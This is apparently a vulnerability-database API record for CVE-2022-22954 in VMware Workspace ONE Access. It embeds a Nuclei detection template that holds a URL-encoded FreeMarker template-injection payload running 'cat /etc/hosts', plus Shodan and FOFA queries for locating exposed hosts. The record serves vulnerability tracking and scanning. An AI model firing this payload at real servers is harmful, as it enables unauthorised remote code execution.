{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-22954/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-22954/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-22954/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-22954/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-22954/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-22954"},"sightings":{"href":"/api/v1/sightings/cve-2022-22954"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99997,"kev":true,"percentile":0.99989},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-22954.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-22954\n\ninfo:\n  name: VMware Workspace ONE Access - Server-Side Template Injection\n  author: sherlocksecurity\n  severity: critical\n  description: |\n    VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n  impact: |\n    Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n  remediation: |\n    Apply the latest security patches provided by VMware to mitigate this vulnerability.\n  reference:\n    - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011\n    - https://www.vmware.com/security/advisories/VMSA-2022-0011.html\n    - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-22954\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-22954\n    cwe-id: CWE-94\n    epss-score: 0.99997\n    epss-percentile: 0.99989\n    cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: vmware\n    product: identity_manager\n    shodan-query: http.favicon.hash:-1250474341\n    fofa-query:\n      - icon_hash=-1250474341\n      - app=\"vmware-workspace-one-access\" || app=\"vmware-identity-manager\" || app=\"vmware-vrealize\"\n  tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Authorization context is not valid\"\n\n      - type: status\n        status:\n          - 400\n# digest: 4a0a0047304502202dc112f20346808300ee75fa341e532fefed6089fb6d1a34b2cd017b30bd1e8c0221009afa1fcc04c3842861981786c7353b9d0c2b20582d43672b75a9cc98e2240f2a:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-22954"}